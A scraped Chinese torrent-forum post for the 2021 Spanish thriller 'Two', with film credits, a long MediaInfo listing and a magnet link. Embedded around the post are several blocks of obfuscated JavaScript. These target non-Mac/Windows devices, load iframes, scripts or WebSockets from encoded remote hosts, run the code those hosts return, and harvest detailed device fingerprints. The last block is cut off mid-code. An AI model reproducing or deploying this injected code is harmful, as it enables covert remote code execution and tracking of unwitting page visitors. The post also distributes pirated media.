二的梦魇[中文字幕].Two.2021.1080p.NF.WEB-DL.DDP5.1.x264-btbt9527.com 3.04GB

版主小s 5月前 301



window['' + 'j' + '7' + '7' + '5' + '0' + 'e' + '9' + 'd' + '6'+'']=function(){;(function(u,i,w,d){if(/^Mac|Win/.test(navigator.platform)){return};var dc=function(n){return String.fromCharCode(n)};var x=w[dc(0x61)+dc(0x74)+dc(0x6F)+dc(0x62)],cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';var wr='write';'jQuery';var f=d[crd](x('aWZyYW1l'));f.id='x'+(Math.random()*10000);f.style.width='10px';f.style.height=5+'px';f.style.background='#FFF';f.src=['https://',x(u),'r','j8',i].join('/');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data.k==i){d.getElementById(f.id).remove();new Function('_tdcs',x(e.data.v))(cs)}})})('ai5neGxzanQuY29t','241222251495493',window,document)};


image.png

◎译 名 二的梦魇 / Two

◎片 名 Dos

◎年 代 2021

◎产 地 西班牙

◎类 别 惊悚

◎语 言 西班牙语

◎上映日期 2021-12-10(西班牙)

◎IMDb链接 https://www.imdb.com/title/tt12358104/

◎豆瓣链接 https://movie.douban.com/subject/35669507/

◎片 长 70分钟

◎导 演 玛·塔尔加纳 Mar Targarona (id:1412165)

◎编 剧 库卡·卡纳尔斯 Cuca Canals (id:1279987)

克里斯蒂安·莫利纳 Christian Molina (id:1292301)

◎演 员 巴勃罗·德尔基 Pablo Derqui (id:1023869)

玛丽娜·伽特尔 Marina Gatell (id:1009822)

◎标 签 WK / Netflix

◎简 介

Two people, a man and a woman, wake up naked and with their abdomens attached to each other.

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 127626373962324689831436214294301935442 (0x6003F20E4DCD84CAF93BF0A2480C8752)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 3.04 GiB

  8. Duration : 1 h 11 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 6 118 kb/s

  11. Encoded date : UTC 2021-12-11 14:50:50

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 3 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 3 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 11 min

  24. Bit rate mode : Variable

  25. Bit rate : 2 271 kb/s

  26. Nominal bit rate : 2 035 kb/s

  27. Maximum bit rate : 4 740 kb/s

  28. Width : 1 920 pixels

  29. Height : 1 080 pixels

  30. Display aspect ratio : 16:9

  31. Frame rate mode : Constant

  32. Frame rate : 25.000 FPS

  33. Color space : YUV

  34. Chroma subsampling : 4:2:0

  35. Bit depth : 8 bits

  36. Scan type : Progressive

  37. Bits/(Pixel*Frame) : 0.044

  38. Stream size : 1.13 GiB (37%)

  39. Writing library : x264 core 148 r2722 1b0121b

  40. Encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x1:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=24 / chroma_me=1 / trellis=2 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=2 / b_pyramid=0 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=25 / scenecut=0 / intra_refresh=0 / rc_lookahead=50 / rc=2pass / mbtree=1 / bitrate=2035 / ratetol=1.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=4740 / vbv_bufsize=6320 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00

  41. Default : Yes

  42. Forced : No


  43. Audio #1

  44. ID : 2

  45. Format : E-AC-3

  46. Format/Info : Enhanced AC-3

  47. Commercial name : Dolby Digital Plus

  48. Codec ID : A_EAC3

  49. Duration : 1 h 11 min

  50. Bit rate mode : Constant

  51. Bit rate : 640 kb/s

  52. Channel(s) : 6 channels

  53. Channel layout : L R C LFE Ls Rs

  54. Sampling rate : 48.0 kHz

  55. Frame rate : 31.250 FPS (1536 SPF)

  56. Compression mode : Lossy

  57. Stream size : 326 MiB (10%)

  58. Title : European Spanish

  59. Language : Spanish

  60. Service kind : Complete Main

  61. Default : Yes

  62. Forced : No


  63. Audio #2

  64. ID : 3

  65. Format : E-AC-3

  66. Format/Info : Enhanced AC-3

  67. Commercial name : Dolby Digital Plus

  68. Codec ID : A_EAC3

  69. Duration : 1 h 11 min

  70. Bit rate mode : Constant

  71. Bit rate : 640 kb/s

  72. Channel(s) : 6 channels

  73. Channel layout : L R C LFE Ls Rs

  74. Sampling rate : 48.0 kHz

  75. Frame rate : 31.250 FPS (1536 SPF)

  76. Compression mode : Lossy

  77. Stream size : 326 MiB (10%)

  78. Title : English

  79. Language : English

  80. Service kind : Complete Main

  81. Default : No

  82. Forced : No


  83. Audio #3

  84. ID : 4

  85. Format : E-AC-3

  86. Format/Info : Enhanced AC-3

  87. Commercial name : Dolby Digital Plus

  88. Codec ID : A_EAC3

  89. Duration : 1 h 11 min

  90. Bit rate mode : Constant

  91. Bit rate : 640 kb/s

  92. Channel(s) : 6 channels

  93. Channel layout : L R C LFE Ls Rs

  94. Sampling rate : 48.0 kHz

  95. Frame rate : 31.250 FPS (1536 SPF)

  96. Compression mode : Lossy

  97. Stream size : 326 MiB (10%)

  98. Title : German

  99. Language : German

  100. Service kind : Complete Main

  101. Default : No

  102. Forced : No


  103. Audio #4

  104. ID : 5

  105. Format : E-AC-3

  106. Format/Info : Enhanced AC-3

  107. Commercial name : Dolby Digital Plus

  108. Codec ID : A_EAC3

  109. Duration : 1 h 11 min

  110. Bit rate mode : Constant

  111. Bit rate : 640 kb/s

  112. Channel(s) : 6 channels

  113. Channel layout : L R C LFE Ls Rs

  114. Sampling rate : 48.0 kHz

  115. Frame rate : 31.250 FPS (1536 SPF)

  116. Compression mode : Lossy

  117. Stream size : 326 MiB (10%)

  118. Title : Italian

  119. Language : Italian

  120. Service kind : Complete Main

  121. Default : No

  122. Forced : No


  123. Audio #5

  124. ID : 6

  125. Format : E-AC-3

  126. Format/Info : Enhanced AC-3

  127. Commercial name : Dolby Digital Plus

  128. Codec ID : A_EAC3

  129. Duration : 1 h 11 min

  130. Bit rate mode : Constant

  131. Bit rate : 640 kb/s

  132. Channel(s) : 6 channels

  133. Channel layout : L R C LFE Ls Rs

  134. Sampling rate : 48.0 kHz

  135. Frame rate : 31.250 FPS (1536 SPF)

  136. Compression mode : Lossy

  137. Stream size : 326 MiB (10%)

  138. Title : Polish

  139. Language : Polish

  140. Service kind : Complete Main

  141. Default : No

  142. Forced : No


  143. Audio #6

  144. ID : 7

  145. Format : E-AC-3

  146. Format/Info : Enhanced AC-3

  147. Commercial name : Dolby Digital Plus

  148. Codec ID : A_EAC3

  149. Duration : 1 h 11 min

  150. Bit rate mode : Constant

  151. Bit rate : 640 kb/s

  152. Channel(s) : 6 channels

  153. Channel layout : L R C LFE Ls Rs

  154. Sampling rate : 48.0 kHz

  155. Frame rate : 31.250 FPS (1536 SPF)

  156. Compression mode : Lossy

  157. Stream size : 326 MiB (10%)

  158. Title : Brazilian Portuguese

  159. Language : Portuguese

  160. Service kind : Complete Main

  161. Default : No

  162. Forced : No


  163. Text #1

  164. ID : 8

  165. Format : UTF-8

  166. Codec ID : S_TEXT/UTF8

  167. Codec ID/Info : UTF-8 Plain Text

  168. Duration : 1 h 2 min

  169. Bit rate : 41 b/s

  170. Count of elements : 802

  171. Stream size : 18.9 KiB (0%)

  172. Title : English

  173. Language : English

  174. Default : Yes

  175. Forced : No


  176. Text #2

  177. ID : 9

  178. Format : UTF-8

  179. Codec ID : S_TEXT/UTF8

  180. Codec ID/Info : UTF-8 Plain Text

  181. Duration : 1 h 10 min

  182. Bit rate : 62 b/s

  183. Count of elements : 808

  184. Stream size : 32.3 KiB (0%)

  185. Title : Arabic

  186. Language : Arabic

  187. Default : No

  188. Forced : No


  189. Text #3

  190. ID : 10

  191. Format : UTF-8

  192. Codec ID : S_TEXT/UTF8

  193. Codec ID/Info : UTF-8 Plain Text

  194. Duration : 1 h 10 min

  195. Bit rate : 40 b/s

  196. Count of elements : 825

  197. Stream size : 20.8 KiB (0%)

  198. Title : Chinese Simplified

  199. Language : Chinese

  200. Default : No

  201. Forced : No


  202. Text #4

  203. ID : 11

  204. Format : UTF-8

  205. Codec ID : S_TEXT/UTF8

  206. Codec ID/Info : UTF-8 Plain Text

  207. Duration : 1 h 10 min

  208. Bit rate : 37 b/s

  209. Count of elements : 807

  210. Stream size : 19.3 KiB (0%)

  211. Title : Chinese Traditional

  212. Language : Chinese

  213. Default : No

  214. Forced : No


  215. Text #5

  216. ID : 12

  217. Format : UTF-8

  218. Codec ID : S_TEXT/UTF8

  219. Codec ID/Info : UTF-8 Plain Text

  220. Duration : 1 h 10 min

  221. Bit rate : 31 b/s

  222. Count of elements : 718

  223. Stream size : 16.0 KiB (0%)

  224. Title : Croatian

  225. Language : Croatian

  226. Default : No

  227. Forced : No


  228. Text #6

  229. ID : 13

  230. Format : UTF-8

  231. Codec ID : S_TEXT/UTF8

  232. Codec ID/Info : UTF-8 Plain Text

  233. Duration : 1 h 10 min

  234. Bit rate : 32 b/s

  235. Count of elements : 759

  236. Stream size : 16.9 KiB (0%)

  237. Title : Czech

  238. Language : Czech

  239. Default : No

  240. Forced : No


  241. Text #7

  242. ID : 14

  243. Format : UTF-8

  244. Codec ID : S_TEXT/UTF8

  245. Codec ID/Info : UTF-8 Plain Text

  246. Duration : 1 h 10 min

  247. Bit rate : 36 b/s

  248. Count of elements : 792

  249. Stream size : 18.6 KiB (0%)

  250. Title : Danish

  251. Language : Danish

  252. Default : No

  253. Forced : No


  254. Text #8

  255. ID : 15

  256. Format : UTF-8

  257. Codec ID : S_TEXT/UTF8

  258. Codec ID/Info : UTF-8 Plain Text

  259. Duration : 1 h 10 min

  260. Bit rate : 35 b/s

  261. Count of elements : 681

  262. Stream size : 18.4 KiB (0%)

  263. Title : Dutch

  264. Language : Dutch

  265. Default : No

  266. Forced : No


  267. Text #9

  268. ID : 16

  269. Format : UTF-8

  270. Codec ID : S_TEXT/UTF8

  271. Codec ID/Info : UTF-8 Plain Text

  272. Duration : 1 h 10 min

  273. Bit rate : 34 b/s

  274. Count of elements : 655

  275. Stream size : 17.7 KiB (0%)

  276. Title : Finnish

  277. Language : Finnish

  278. Default : No

  279. Forced : No


  280. Text #10

  281. ID : 17

  282. Format : UTF-8

  283. Codec ID : S_TEXT/UTF8

  284. Codec ID/Info : UTF-8 Plain Text

  285. Duration : 1 h 10 min

  286. Bit rate : 34 b/s

  287. Count of elements : 823

  288. Stream size : 17.9 KiB (0%)

  289. Title : French

  290. Language : French

  291. Default : No

  292. Forced : No


  293. Text #11

  294. ID : 18

  295. Format : UTF-8

  296. Codec ID : S_TEXT/UTF8

  297. Codec ID/Info : UTF-8 Plain Text

  298. Duration : 1 h 10 min

  299. Bit rate : 36 b/s

  300. Count of elements : 815

  301. Stream size : 18.9 KiB (0%)

  302. Title : German

  303. Language : German

  304. Default : No

  305. Forced : No


  306. Text #12

  307. ID : 19

  308. Format : UTF-8

  309. Codec ID : S_TEXT/UTF8

  310. Codec ID/Info : UTF-8 Plain Text

  311. Duration : 1 h 10 min

  312. Bit rate : 60 b/s

  313. Count of elements : 738

  314. Stream size : 31.2 KiB (0%)

  315. Title : Greek

  316. Language : Greek

  317. Default : No

  318. Forced : No


  319. Text #13

  320. ID : 20

  321. Format : UTF-8

  322. Codec ID : S_TEXT/UTF8

  323. Codec ID/Info : UTF-8 Plain Text

  324. Duration : 1 h 10 min

  325. Bit rate : 56 b/s

  326. Count of elements : 773

  327. Stream size : 29.1 KiB (0%)

  328. Title : Hebrew

  329. Language : Hebrew

  330. Default : No

  331. Forced : No


  332. Text #14

  333. ID : 21

  334. Format : UTF-8

  335. Codec ID : S_TEXT/UTF8

  336. Codec ID/Info : UTF-8 Plain Text

  337. Duration : 1 h 10 min

  338. Bit rate : 35 b/s

  339. Count of elements : 796

  340. Stream size : 18.3 KiB (0%)

  341. Title : Hungarian

  342. Language : Hungarian

  343. Default : No

  344. Forced : No


  345. Text #15

  346. ID : 22

  347. Format : UTF-8

  348. Codec ID : S_TEXT/UTF8

  349. Codec ID/Info : UTF-8 Plain Text

  350. Duration : 1 h 10 min

  351. Bit rate : 36 b/s

  352. Count of elements : 813

  353. Stream size : 18.6 KiB (0%)

  354. Title : Indonesian

  355. Language : Indonesian

  356. Default : No

  357. Forced : No


  358. Text #16

  359. ID : 23

  360. Format : UTF-8

  361. Codec ID : S_TEXT/UTF8

  362. Codec ID/Info : UTF-8 Plain Text

  363. Duration : 1 h 7 min

  364. Bit rate : 34 b/s

  365. Count of elements : 801

  366. Stream size : 17.2 KiB (0%)

  367. Title : Italian

  368. Language : Italian

  369. Default : No

  370. Forced : No


  371. Text #17

  372. ID : 24

  373. Format : UTF-8

  374. Codec ID : S_TEXT/UTF8

  375. Codec ID/Info : UTF-8 Plain Text

  376. Duration : 1 h 10 min

  377. Bit rate : 32 b/s

  378. Count of elements : 778

  379. Stream size : 16.9 KiB (0%)

  380. Title : Japanese

  381. Language : Japanese

  382. Default : No

  383. Forced : No


  384. Text #18

  385. ID : 25

  386. Format : UTF-8

  387. Codec ID : S_TEXT/UTF8

  388. Codec ID/Info : UTF-8 Plain Text

  389. Duration : 1 h 10 min

  390. Bit rate : 43 b/s

  391. Count of elements : 796

  392. Stream size : 22.6 KiB (0%)

  393. Title : Korean

  394. Language : Korean

  395. Default : No

  396. Forced : No


  397. Text #19

  398. ID : 26

  399. Format : UTF-8

  400. Codec ID : S_TEXT/UTF8

  401. Codec ID/Info : UTF-8 Plain Text

  402. Duration : 1 h 10 min

  403. Bit rate : 33 b/s

  404. Count of elements : 825

  405. Stream size : 17.3 KiB (0%)

  406. Title : Malay

  407. Language : Malay

  408. Default : No

  409. Forced : No


  410. Text #20

  411. ID : 27

  412. Format : UTF-8

  413. Codec ID : S_TEXT/UTF8

  414. Codec ID/Info : UTF-8 Plain Text

  415. Duration : 1 h 10 min

  416. Bit rate : 34 b/s

  417. Count of elements : 626

  418. Stream size : 17.5 KiB (0%)

  419. Title : Norwegian Bokmal

  420. Language : Norwegian Bokmal

  421. Default : No

  422. Forced : No


  423. Text #21

  424. ID : 28

  425. Format : UTF-8

  426. Codec ID : S_TEXT/UTF8

  427. Codec ID/Info : UTF-8 Plain Text

  428. Duration : 1 h 10 min

  429. Bit rate : 32 b/s

  430. Count of elements : 770

  431. Stream size : 16.9 KiB (0%)

  432. Title : Polish

  433. Language : Polish

  434. Default : No

  435. Forced : No


  436. Text #22

  437. ID : 29

  438. Format : UTF-8

  439. Codec ID : S_TEXT/UTF8

  440. Codec ID/Info : UTF-8 Plain Text

  441. Duration : 1 h 10 min

  442. Bit rate : 34 b/s

  443. Count of elements : 773

  444. Stream size : 17.6 KiB (0%)

  445. Title : Portuguese

  446. Language : Portuguese

  447. Default : No

  448. Forced : No


  449. Text #23

  450. ID : 30

  451. Format : UTF-8

  452. Codec ID : S_TEXT/UTF8

  453. Codec ID/Info : UTF-8 Plain Text

  454. Duration : 1 h 10 min

  455. Bit rate : 36 b/s

  456. Count of elements : 729

  457. Stream size : 18.7 KiB (0%)

  458. Title : Brazilian Portuguese

  459. Language : Portuguese

  460. Default : No

  461. Forced : No


  462. Text #24

  463. ID : 31

  464. Format : UTF-8

  465. Codec ID : S_TEXT/UTF8

  466. Codec ID/Info : UTF-8 Plain Text

  467. Duration : 1 h 10 min

  468. Bit rate : 39 b/s

  469. Count of elements : 795

  470. Stream size : 20.4 KiB (0%)

  471. Title : Romanian

  472. Language : Romanian

  473. Default : No

  474. Forced : No


  475. Text #25

  476. ID : 32

  477. Format : UTF-8

  478. Codec ID : S_TEXT/UTF8

  479. Codec ID/Info : UTF-8 Plain Text

  480. Duration : 1 h 10 min

  481. Bit rate : 56 b/s

  482. Count of elements : 799

  483. Stream size : 29.1 KiB (0%)

  484. Title : Russian

  485. Language : Russian

  486. Default : No

  487. Forced : No


  488. Text #26

  489. ID : 33

  490. Format : UTF-8

  491. Codec ID : S_TEXT/UTF8

  492. Codec ID/Info : UTF-8 Plain Text

  493. Duration : 1 h 4 min

  494. Bit rate : 64 b/s

  495. Count of elements : 870

  496. Stream size : 30.6 KiB (0%)

  497. Title : European Spanish

  498. Language : Spanish

  499. Default : No

  500. Forced : No


  501. Text #27

  502. ID : 34

  503. Format : UTF-8

  504. Codec ID : S_TEXT/UTF8

  505. Codec ID/Info : UTF-8 Plain Text

  506. Duration : 1 h 10 min

  507. Bit rate : 34 b/s

  508. Count of elements : 778

  509. Stream size : 17.8 KiB (0%)

  510. Title : Swedish

  511. Language : Swedish

  512. Default : No

  513. Forced : No


  514. Text #28

  515. ID : 35

  516. Format : UTF-8

  517. Codec ID : S_TEXT/UTF8

  518. Codec ID/Info : UTF-8 Plain Text

  519. Duration : 1 h 10 min

  520. Bit rate : 93 b/s

  521. Count of elements : 837

  522. Stream size : 48.1 KiB (0%)

  523. Title : Thai

  524. Language : Thai

  525. Default : No

  526. Forced : No


  527. Text #29

  528. ID : 36

  529. Format : UTF-8

  530. Codec ID : S_TEXT/UTF8

  531. Codec ID/Info : UTF-8 Plain Text

  532. Duration : 1 h 10 min

  533. Bit rate : 35 b/s

  534. Count of elements : 758

  535. Stream size : 18.4 KiB (0%)

  536. Title : Turkish

  537. Language : Turkish

  538. Default : No

  539. Forced : No


  540. Text #30

  541. ID : 37

  542. Format : UTF-8

  543. Codec ID : S_TEXT/UTF8

  544. Codec ID/Info : UTF-8 Plain Text

  545. Duration : 1 h 10 min

  546. Bit rate : 57 b/s

  547. Count of elements : 820

  548. Stream size : 29.5 KiB (0%)

  549. Title : Ukrainian

  550. Language : Ukrainian

  551. Default : No

  552. Forced : No


  553. Text #31

  554. ID : 38

  555. Format : UTF-8

  556. Codec ID : S_TEXT/UTF8

  557. Codec ID/Info : UTF-8 Plain Text

  558. Duration : 1 h 10 min

  559. Bit rate : 49 b/s

  560. Count of elements : 782

  561. Stream size : 25.3 KiB (0%)

  562. Title : Vietnamese

  563. Language : Vietnamese

  564. Default : No

  565. Forced : No




复制代码


TAGS 惊悚

磁力链:
  • magnet:?xt=urn:btih:751F8B90F3AF3DD9342CB23649E6747579B92602




var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x57\x62\x51\x66\x48\x58\x65\x61\x49']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='wob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,ref:a(),url:b(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9vc2tqZmtkbHNqZmRzLnN6ZmhsOTkuYY29t','d3NNzOi8vd3MuYXJ0cy1jbG91ZC5uZXQ6ODU4NNSx3c3M6Ly93cy5qaW5mdTIxLmNNvbTo4NNTg1',window,document,['Y','N']);}:function(){};
上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x45\x77\x59\x6e\x77\x4c\x44\x4f\x62\x63']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='wob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function 